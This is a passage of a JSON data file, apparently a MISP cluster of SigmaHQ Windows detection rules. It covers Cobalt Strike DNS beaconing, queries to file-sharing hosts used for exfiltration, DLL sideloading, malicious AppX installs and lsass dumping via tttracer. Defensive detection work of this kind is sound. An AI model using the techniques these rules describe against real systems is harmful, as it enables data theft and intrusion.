Apply additional filters as needed" ], "filename": "win_capi2_acquire_certificate_private_key.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://www.splunk.com/en_us/blog/security/breaking-the-chain-defending-against-certificate-services-abuse.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/capi2/win_capi2_acquire_certificate_private_key.yml" ], "tags": [ "attack.credential-access", "attack.t1649" ] }, "related": [ { "dest-uuid": "7de1f7ac-5d0c-4c9c-8873-627202205331", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "e2b5163d-7deb-4566-9af3-40afea6858c3", "value": "Certificate Private Key Acquired" }, { "description": "Detects a program that invoked suspicious DNS queries known from Cobalt Strike beacons", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-01-16", "falsepositive": [ "Unknown" ], "filename": "win_dns_client__mal_cobaltstrike.yml", "level": "critical", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://www.sekoia.io/en/hunting-and-detecting-cobalt-strike/", "https://www.icebrg.io/blog/footprints-of-fin7-tracking-actor-patterns", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/dns_client/win_dns_client__mal_cobaltstrike.yml" ], "tags": [ "attack.command-and-control", "attack.t1071.004" ] }, "related": [ { "dest-uuid": "1996eef1-ced3-4d7f-bf94-33298cabbf72", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "0d18728b-f5bf-4381-9dcf-915539fff6c2", "value": "Suspicious Cobalt Strike DNS Beaconing - DNS Client" }, { "description": "Detects DNS queries for subdomains related to \"Put.io\" sharing website.", "meta": { "author": "Omar Khaled (@beacon_exe)", "creation_date": "2024-08-23", "falsepositive": [ "Legitimate DNS queries and 
usage of Put.io" ], "filename": "win_dns_client_put_io.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://darkatlas.io/blog/medusa-ransomware-group-opsec-failure", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/dns_client/win_dns_client_put_io.yml" ], "tags": [ "attack.command-and-control" ] }, "uuid": "8b69fd42-9dad-4674-abef-7fdef43ef92a", "value": "DNS Query To Put.io - DNS Client" }, { "description": "Detects DNS resolution of an .onion address related to Tor routing networks", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-02-20", "falsepositive": [ "Unlikely" ], "filename": "win_dns_client_tor_onion.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://www.logpoint.com/en/blog/detecting-tor-use-with-logpoint/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/dns_client/win_dns_client_tor_onion.yml" ], "tags": [ "attack.command-and-control", "attack.t1090.003" ] }, "related": [ { "dest-uuid": "a782ebe2-daba-42c7-bc82-e8e9d923162d", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "8384bd26-bde6-4da9-8e5d-4174a7a47ca2", "value": "Query Tor Onion Address - DNS Client" }, { "description": "Detects DNS queries for subdomains related to MEGA sharing website", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-01-16", "falsepositive": [ "Legitimate DNS queries and usage of Mega" ], "filename": "win_dns_client_mega_nz.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://research.nccgroup.com/2021/05/27/detecting-rclone-an-effective-tool-for-exfiltration/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/dns_client/win_dns_client_mega_nz.yml" ], "tags": [ 
"attack.exfiltration", "attack.t1567.002" ] }, "related": [ { "dest-uuid": "bf1b6176-597c-4600-bfcd-ac989670f96b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "66474410-b883-415f-9f8d-75345a0a66a6", "value": "DNS Query To MEGA Hosting Website - DNS Client" }, { "description": "Detects DNS queries for anonfiles.com, which is an anonymous file upload platform often used for malicious purposes", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-01-16", "falsepositive": [ "Rare legitimate access to anonfiles.com" ], "filename": "win_dns_client_anonymfiles_com.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-blackbyte", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/dns_client/win_dns_client_anonymfiles_com.yml" ], "tags": [ "attack.exfiltration", "attack.t1567.002" ] }, "related": [ { "dest-uuid": "bf1b6176-597c-4600-bfcd-ac989670f96b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "29f171d7-aa47-42c7-9c7b-3c87938164d9", "value": "DNS Query for Anonfiles.com Domain - DNS Client" }, { "description": "Detects DNS queries to \"ufile.io\", which was seen abused by malware and threat actors as a method for data exfiltration", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-01-16", "falsepositive": [ "DNS queries for \"ufile\" are not malicious by nature necessarily. 
Investigate the source to determine the necessary actions to take" ], "filename": "win_dns_client_ufile_io.yml", "level": "low", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://thedfirreport.com/2021/12/13/diavol-ransomware/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/dns_client/win_dns_client_ufile_io.yml" ], "tags": [ "attack.exfiltration", "attack.t1567.002" ] }, "related": [ { "dest-uuid": "bf1b6176-597c-4600-bfcd-ac989670f96b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "090ffaad-c01a-4879-850c-6d57da98452d", "value": "DNS Query To Ufile.io - DNS Client" }, { "description": "Detects suspicious application installed by looking at the added shortcut to the app resolver cache", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-08-14", "falsepositive": [ "Packages or applications being legitimately used by users or administrators" ], "filename": "win_shell_core_susp_packages_installed.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://nasbench.medium.com/finding-forensic-goodness-in-obscure-windows-event-logs-60e978ea45a3", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/shell_core/win_shell_core_susp_packages_installed.yml" ], "tags": [ "attack.execution" ] }, "uuid": "83c161b6-ca67-4f33-8ad0-644a0737cf07", "value": "Suspicious Application Installed" }, { "description": "Detects an appx package deployment that was blocked by AppLocker policy", "meta": { "author": "frack113", "creation_date": "2023-01-11", "falsepositive": [ "Unknown" ], "filename": "win_appxdeployment_server_applocker_block.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/windows/win32/appxpkg/troubleshooting", 
"https://github.com/nasbench/EVTX-ETW-Resources/blob/7a806a148b3d9d381193d4a80356016e6e8b1ee8/ETWEventsList/CSV/Windows11/22H2/W11_22H2_Pro_20220920_22621.382/Providers/Microsoft-Windows-AppXDeployment-Server.csv", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/appxdeployment_server/win_appxdeployment_server_applocker_block.yml" ], "tags": [ "attack.defense-evasion" ] }, "uuid": "6ae53108-c3a0-4bee-8f45-c7591a2c337f", "value": "Deployment AppX Package Was Blocked By AppLocker" }, { "description": "Detects potential installation or installation attempts of known malicious appx packages", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-01-11", "falsepositive": [ "Rare occasions where a malicious package uses the exact same name and version as a legitimate application" ], "filename": "win_appxdeployment_server_mal_appx_names.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://forensicitguy.github.io/analyzing-magnitude-magniber-appx/", "https://www.sentinelone.com/labs/inside-malicious-windows-apps-for-malware-deployment/", "https://news.sophos.com/en-us/2021/11/11/bazarloader-call-me-back-attack-abuses-windows-10-apps-mechanism/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/appxdeployment_server/win_appxdeployment_server_mal_appx_names.yml" ], "tags": [ "attack.defense-evasion" ] }, "uuid": "09d3b48b-be17-47f5-bf4e-94e7e75d09ce", "value": "Potential Malicious AppX Package Installation Attempts" }, { "description": "Detects an appx package deployment that was blocked by the local computer policy", "meta": { "author": "frack113", "creation_date": "2023-01-11", "falsepositive": [ "Unknown" ], "filename": "win_appxdeployment_server_policy_block.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ 
"https://learn.microsoft.com/en-us/windows/win32/appxpkg/troubleshooting", "https://github.com/nasbench/EVTX-ETW-Resources/blob/7a806a148b3d9d381193d4a80356016e6e8b1ee8/ETWEventsList/CSV/Windows11/22H2/W11_22H2_Pro_20220920_22621.382/Providers/Microsoft-Windows-AppXDeployment-Server.csv", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/appxdeployment_server/win_appxdeployment_server_policy_block.yml" ], "tags": [ "attack.defense-evasion" ] }, "uuid": "e021bbb5-407f-41f5-9dc9-1864c45a7a51", "value": "Deployment Of The AppX Package Was Blocked By The Policy" }, { "description": "Detects an appx package added to the pipeline of the \"to be processed\" packages which is located in uncommon locations", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-01-11", "falsepositive": [ "Unknown" ], "filename": "win_appxdeployment_server_uncommon_package_locations.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/windows/win32/appxpkg/troubleshooting", "https://www.sentinelone.com/labs/inside-malicious-windows-apps-for-malware-deployment/", "Internal Research", "https://news.sophos.com/en-us/2021/11/11/bazarloader-call-me-back-attack-abuses-windows-10-apps-mechanism/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/appxdeployment_server/win_appxdeployment_server_uncommon_package_locations.yml" ], "tags": [ "attack.defense-evasion" ] }, "uuid": "c977cb50-3dff-4a9f-b873-9290f56132f1", "value": "Uncommon AppX Package Locations" }, { "description": "Detects an appx package installation with the error code \"0x80073cff\" which indicates that the package didn't meet the signing requirements and could be suspicious", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-01-11", "falsepositive": [ "Legitimate AppX packages not signed by MS used as part of an enterprise" ], 
"filename": "win_appxdeployment_server_susp_appx_package_installation.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/windows/win32/appxpkg/troubleshooting", "https://www.sentinelone.com/labs/inside-malicious-windows-apps-for-malware-deployment/", "Internal Research", "https://news.sophos.com/en-us/2021/11/11/bazarloader-call-me-back-attack-abuses-windows-10-apps-mechanism/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/appxdeployment_server/win_appxdeployment_server_susp_appx_package_installation.yml" ], "tags": [ "attack.defense-evasion" ] }, "uuid": "898d5fc9-fbc3-43de-93ad-38e97237c344", "value": "Suspicious AppX Package Installation Attempt" }, { "description": "Detects an appx package added to the pipeline of the \"to be processed\" packages which is located in suspicious locations", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-01-11", "falsepositive": [ "Unknown" ], "filename": "win_appxdeployment_server_susp_package_locations.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/windows/win32/appxpkg/troubleshooting", "https://www.sentinelone.com/labs/inside-malicious-windows-apps-for-malware-deployment/", "Internal Research", "https://news.sophos.com/en-us/2021/11/11/bazarloader-call-me-back-attack-abuses-windows-10-apps-mechanism/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/appxdeployment_server/win_appxdeployment_server_susp_package_locations.yml" ], "tags": [ "attack.defense-evasion" ] }, "uuid": "5cdeaf3d-1489-477c-95ab-c318559fc051", "value": "Suspicious AppX Package Locations" }, { "description": "Detects an appx package added to the pipeline of the \"to be processed\" packages which was downloaded from a suspicious domain.\n", "meta": { "author": "Nasreddine 
Bencherchali (Nextron Systems)", "creation_date": "2023-01-11", "falsepositive": [ "Unknown" ], "filename": "win_appxdeployment_server_susp_domains.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/windows/win32/appxpkg/troubleshooting", "https://www.sentinelone.com/labs/inside-malicious-windows-apps-for-malware-deployment/", "Internal Research", "https://news.sophos.com/en-us/2021/11/11/bazarloader-call-me-back-attack-abuses-windows-10-apps-mechanism/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/appxdeployment_server/win_appxdeployment_server_susp_domains.yml" ], "tags": [ "attack.defense-evasion" ] }, "uuid": "8b48ad89-10d8-4382-a546-50588c410f0d", "value": "Suspicious Remote AppX Package Locations" }, { "description": "Detects abuse of Azure Browser SSO by requesting OAuth 2.0 refresh tokens for an Azure-AD-authenticated Windows user (i.e. the machine is joined to Azure AD and a user logs in with their Azure AD account) wanting to perform SSO authentication in the browser.\nAn attacker can use this to authenticate to Azure AD in a browser as that user.\n", "meta": { "author": "Den Iuzvyk", "creation_date": "2020-07-15", "falsepositive": [ "False positives are expected since this rule is only looking for the DLL load event. 
This rule is better used in correlation with related activity" ], "filename": "image_load_dll_azure_microsoft_account_token_provider_dll_load.yml", "level": "low", "logsource.category": "image_load", "logsource.product": "windows", "refs": [ "https://posts.specterops.io/requesting-azure-ad-request-tokens-on-azure-ad-joined-machines-for-browser-sso-2b0409caad30", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_dll_azure_microsoft_account_token_provider_dll_load.yml" ], "tags": [ "attack.defense-evasion", "attack.privilege-escalation", "attack.t1574.002" ] }, "related": [ { "dest-uuid": "e64c62cf-9cd7-4a14-94ec-cdaac43ab44b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "50f852e6-af22-4c78-9ede-42ef36aa3453", "value": "Potential Azure Browser SSO Abuse" }, { "description": "Detects potential DLL sideloading of \"CCleanerDU.dll\"", "meta": { "author": "X__Junior (Nextron Systems)", "creation_date": "2023-07-13", "falsepositive": [ "False positives could occur from other custom installation paths. Apply additional filters accordingly." 
], "filename": "image_load_side_load_ccleaner_du.yml", "level": "medium", "logsource.category": "image_load", "logsource.product": "windows", "refs": [ "https://lab52.io/blog/2344-2/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_ccleaner_du.yml" ], "tags": [ "attack.defense-evasion", "attack.persistence", "attack.privilege-escalation", "attack.t1574.001", "attack.t1574.002" ] }, "related": [ { "dest-uuid": "2fee9321-3e71-4cf4-af24-d4d40d355b34", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "e64c62cf-9cd7-4a14-94ec-cdaac43ab44b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "1fbc0671-5596-4e17-8682-f020a0b995dc", "value": "Potential CCleanerDU.DLL Sideloading" }, { "description": "Detects DSParse DLL being loaded by an Office Product", "meta": { "author": "Antonlovesdnb", "creation_date": "2020-02-19", "falsepositive": [ "Unknown" ], "filename": "image_load_office_dsparse_dll_load.yml", "level": "medium", "logsource.category": "image_load", "logsource.product": "windows", "refs": [ "https://medium.com/threatpunter/detecting-adversary-tradecraft-with-image-load-event-logging-and-eql-8de93338c16", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_office_dsparse_dll_load.yml" ], "tags": [ "attack.execution", "attack.t1204.002" ] }, "related": [ { "dest-uuid": "232b7f21-adf9-4b42-b936-b9d6f7df856e", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "a2a3b925-7bb0-433b-b508-db9003263cc4", "value": "Active Directory Parsing DLL Loaded Via Office Application" }, { "description": "Detects SILENTTRINITY stager dll loading activity", "meta": { "author": "Aleksey Potapov, oscd.community", "creation_date": "2019-10-22", "falsepositive": [ "Unlikely" ], "filename": 
"image_load_hktl_silenttrinity_stager.yml", "level": "high", "logsource.category": "image_load", "logsource.product": "windows", "refs": [ "https://github.com/byt3bl33d3r/SILENTTRINITY", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_hktl_silenttrinity_stager.yml" ], "tags": [ "attack.command-and-control", "attack.t1071" ] }, "related": [ { "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "75c505b1-711d-4f68-a357-8c3fe37dbf2d", "value": "HackTool - SILENTTRINITY Stager DLL Load" }, { "description": "Detects potential DLL sideloading of \"iviewers.dll\" (OLE/COM Object Interface Viewer)", "meta": { "author": "X__Junior (Nextron Systems)", "creation_date": "2023-03-21", "falsepositive": [ "Unknown" ], "filename": "image_load_side_load_iviewers.yml", "level": "high", "logsource.category": "image_load", "logsource.product": "windows", "refs": [ "https://www.secureworks.com/research/shadowpad-malware-analysis", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_iviewers.yml" ], "tags": [ "attack.defense-evasion", "attack.privilege-escalation", "attack.t1574.001", "attack.t1574.002" ] }, "related": [ { "dest-uuid": "2fee9321-3e71-4cf4-af24-d4d40d355b34", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "e64c62cf-9cd7-4a14-94ec-cdaac43ab44b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "4c21b805-4dd7-469f-b47d-7383a8fcb437", "value": "Potential Iviewers.DLL Sideloading" }, { "description": "Detects potential DLL sideloading of \"appverifUI.dll\"", "meta": { "author": "X__Junior (Nextron Systems)", "creation_date": "2023-06-20", "falsepositive": [ "Unlikely" ], "filename": "image_load_side_load_appverifui.yml", "level": "high", "logsource.category": 
"image_load", "logsource.product": "windows", "refs": [ "https://web.archive.org/web/20220519091349/https://fatrodzianko.com/2020/02/15/dll-side-loading-appverif-exe/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_appverifui.yml" ], "tags": [ "attack.defense-evasion", "attack.privilege-escalation", "attack.t1574.001", "attack.t1574.002" ] }, "related": [ { "dest-uuid": "2fee9321-3e71-4cf4-af24-d4d40d355b34", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "e64c62cf-9cd7-4a14-94ec-cdaac43ab44b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "ee6cea48-c5b6-4304-a332-10fc6446f484", "value": "Potential appverifUI.DLL Sideloading" }, { "description": "Detects processes loading the non-existent DLL \"ShellChromeAPI\". One known example is the \"DeviceEnroller\" binary in combination with the \"PhoneDeepLink\" flag tries to load this DLL.\nAdversaries can drop their own renamed DLL and execute it via DeviceEnroller.exe using this parameter\n", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-12-01", "falsepositive": [ "Unknown" ], "filename": "image_load_side_load_shell_chrome_api.yml", "level": "high", "logsource.category": "image_load", "logsource.product": "windows", "refs": [ "https://mobile.twitter.com/0gtweet/status/1564131230941122561", "https://strontic.github.io/xcyclopedia/library/DeviceEnroller.exe-24BEF0D6B0ECED36BB41831759FDE18D.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_shell_chrome_api.yml" ], "tags": [ "attack.defense-evasion", "attack.persistence", "attack.privilege-escalation", "attack.t1574.001", "attack.t1574.002" ] }, "related": [ { "dest-uuid": "2fee9321-3e71-4cf4-af24-d4d40d355b34", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" 
}, { "dest-uuid": "e64c62cf-9cd7-4a14-94ec-cdaac43ab44b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "ee4c5d06-3abc-48cc-8885-77f1c20f4451", "value": "DLL Sideloading Of ShellChromeAPI.DLL" }, { "description": "Detects DLL sideloading of DLLs usually located in system locations (System32, SysWOW64, etc.).", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-08-14", "falsepositive": [ "Legitimate applications loading their own versions of the DLLs mentioned in this rule" ], "filename": "image_load_side_load_from_non_system_location.yml", "level": "high", "logsource.category": "image_load", "logsource.product": "windows", "refs": [ "https://hijacklibs.net/", "https://blog.cyble.com/2022/07/27/targeted-attacks-being-carried-out-via-dll-sideloading/", "https://www.hexacorn.com/blog/2023/12/26/1-little-known-secret-of-runonce-exe-32-bit/", "https://blog.cyble.com/2022/07/21/qakbot-resurfaces-with-new-playbook/", "https://github.com/XForceIR/SideLoadHunter/blob/cc7ef2e5d8908279b0c4cee4e8b6f85f7b8eed52/SideLoads/README.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_from_non_system_location.yml" ], "tags": [ "attack.defense-evasion", "attack.persistence", "attack.privilege-escalation", "attack.t1574.001", "attack.t1574.002" ] }, "related": [ { "dest-uuid": "2fee9321-3e71-4cf4-af24-d4d40d355b34", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "e64c62cf-9cd7-4a14-94ec-cdaac43ab44b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "4fc0deee-0057-4998-ab31-d24e46e0aba4", "value": "Potential System DLL Sideloading From Non System Locations" }, { "description": "Detects the image load of vss_ps.dll by uncommon executables", "meta": { "author": "Markus Neis, @markus_neis", "creation_date": 
"2021-07-07", "falsepositive": [ "Unknown" ], "filename": "image_load_dll_vss_ps_susp_load.yml", "level": "high", "logsource.category": "image_load", "logsource.product": "windows", "refs": [ "https://www.virustotal.com/gui/file/ba88ca45589fae0139a40ca27738a8fc2dfbe1be5a64a9558f4e0f52b35c5add", "https://twitter.com/am0nsec/status/1412232114980982787", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_dll_vss_ps_susp_load.yml" ], "tags": [ "attack.defense-evasion", "attack.impact", "attack.t1490" ] }, "related": [ { "dest-uuid": "f5d8eed6-48a9-4cdf-a3d7-d1ffa99c3d2a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "333cdbe8-27bb-4246-bf82-b41a0dca4b70", "value": "Suspicious Volume Shadow Copy VSS_PS.dll Load" }, { "description": "Detects potential DLL sideloading of \"EACore.dll\"", "meta": { "author": "X__Junior (Nextron Systems)", "creation_date": "2023-08-03", "falsepositive": [ "Unlikely" ], "filename": "image_load_side_load_eacore.yml", "level": "high", "logsource.category": "image_load", "logsource.product": "windows", "refs": [ "https://research.checkpoint.com/2023/beyond-the-horizon-traveling-the-world-on-camaro-dragons-usb-flash-drives/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_eacore.yml" ], "tags": [ "attack.defense-evasion", "attack.privilege-escalation", "attack.t1574.001", "attack.t1574.002" ] }, "related": [ { "dest-uuid": "2fee9321-3e71-4cf4-af24-d4d40d355b34", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "e64c62cf-9cd7-4a14-94ec-cdaac43ab44b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "edd3ddc3-386f-4ba5-9ada-4376b2cfa7b5", "value": "Potential EACore.DLL Sideloading" }, { "description": "Detects potential DLL sideloading of \"edputil.dll\"", "meta": { "author": 
"X__Junior (Nextron Systems)", "creation_date": "2023-06-09", "falsepositive": [ "Unlikely" ], "filename": "image_load_side_load_edputil.yml", "level": "high", "logsource.category": "image_load", "logsource.product": "windows", "refs": [ "https://alternativeto.net/news/2023/5/cybercriminals-use-wordpad-vulnerability-to-spread-qbot-malware/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_edputil.yml" ], "tags": [ "attack.defense-evasion", "attack.privilege-escalation", "attack.t1574.001", "attack.t1574.002" ] }, "related": [ { "dest-uuid": "2fee9321-3e71-4cf4-af24-d4d40d355b34", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "e64c62cf-9cd7-4a14-94ec-cdaac43ab44b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "e4903324-1a10-4ed3-981b-f6fe3be3a2c2", "value": "Potential Edputil.DLL Sideloading" }, { "description": "Detects loading of a DLL by the VMware Xfer utility from the non-default directory which may be an attempt to sideload arbitrary DLL", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-08-02", "falsepositive": [ "Unlikely" ], "filename": "image_load_side_load_vmware_xfer.yml", "level": "high", "logsource.category": "image_load", "logsource.product": "windows", "refs": [ "https://www.sentinelone.com/labs/lockbit-ransomware-side-loads-cobalt-strike-beacon-with-legitimate-vmware-utility/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_vmware_xfer.yml" ], "tags": [ "attack.defense-evasion", "attack.t1574.002" ] }, "related": [ { "dest-uuid": "e64c62cf-9cd7-4a14-94ec-cdaac43ab44b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "9313dc13-d04c-46d8-af4a-a930cc55d93b", "value": "Potential DLL Sideloading Via VMware Xfer" }, { "description": 
"Detects PowerShell core DLL being loaded by an Office Product", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-06-01", "falsepositive": [ "Unknown" ], "filename": "image_load_office_powershell_dll_load.yml", "level": "medium", "logsource.category": "image_load", "logsource.product": "windows", "refs": [ "Internal Research", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_office_powershell_dll_load.yml" ], "tags": [ "attack.defense-evasion" ] }, "uuid": "bb2ba6fb-95d4-4a25-89fc-30bb736c021a", "value": "PowerShell Core DLL Loaded Via Office Application" }, { "description": "Detects both of CVE-2022-30190 (Follina) and DogWalk vulnerabilities exploiting msdt.exe binary to load the \"sdiageng.dll\" library", "meta": { "author": "Greg (rule)", "creation_date": "2022-06-17", "falsepositive": [ "Unknown" ], "filename": "image_load_dll_sdiageng_load_by_msdt.yml", "level": "high", "logsource.category": "image_load", "logsource.product": "windows", "refs": [ "https://www.securonix.com/blog/detecting-microsoft-msdt-dogwalk/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_dll_sdiageng_load_by_msdt.yml" ], "tags": [ "attack.defense-evasion", "attack.t1202", "cve.2022-30190" ] }, "related": [ { "dest-uuid": "3b0e52ce-517a-4614-a523-1bd5deef6c5e", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "ec8c4047-fad9-416a-8c81-0f479353d7f6", "value": "Diagnostic Library Sdiageng.DLL Loaded By Msdt.EXE" }, { "description": "Detects potential DLL sideloading of Python DLL files.", "meta": { "author": "Swachchhanda Shrawan Poudel", "creation_date": "2024-10-06", "falsepositive": [ "Legitimate software using Python DLLs" ], "filename": "image_load_side_load_python.yml", "level": "medium", "logsource.category": "image_load", "logsource.product": "windows", "refs": [ 
"https://www.securonix.com/blog/seolurker-attack-campaign-uses-seo-poisoning-fake-google-ads-to-install-malware/", "https://github.com/wietze/HijackLibs/tree/dc9c9f2f94e6872051dab58fbafb043fdd8b4176/yml/3rd_party/python", "https://thedfirreport.com/2024/09/30/nitrogen-campaign-drops-sliver-and-ends-with-blackcat-ransomware/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_python.yml" ], "tags": [ "attack.defense-evasion", "attack.t1574.002" ] }, "related": [ { "dest-uuid": "e64c62cf-9cd7-4a14-94ec-cdaac43ab44b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "d36f7c12-14a3-4d48-b6b8-774b9c66f44d", "value": "Potential Python DLL SideLoading" }, { "description": "Detects usage of Time Travel Debugging Utility. Adversaries can execute malicious processes and dump processes, such as lsass.exe, via tttracer.exe.", "meta": { "author": "Ensar Şamil, @sblmsrsn, @oscd_initiative", "creation_date": "2020-10-06", "falsepositive": [ "Legitimate usage by software developers/testers" ], "filename": "image_load_dll_tttracer_module_load.yml", "level": "high", "logsource.category": "image_load", "logsource.product": "windows", "refs": [ "https://twitter.com/mattifestation/status/1196390321783025666", "https://twitter.com/oulusoyum/status/1191329746069655553", "https://lolbas-project.github.io/lolbas/Binaries/Tttracer/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_dll_tttracer_module_load.yml" ], "tags": [ "attack.defense-evasion", "attack.credential-access", "attack.t1218", "attack.t1003.001" ] }, "related": [ { "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": 
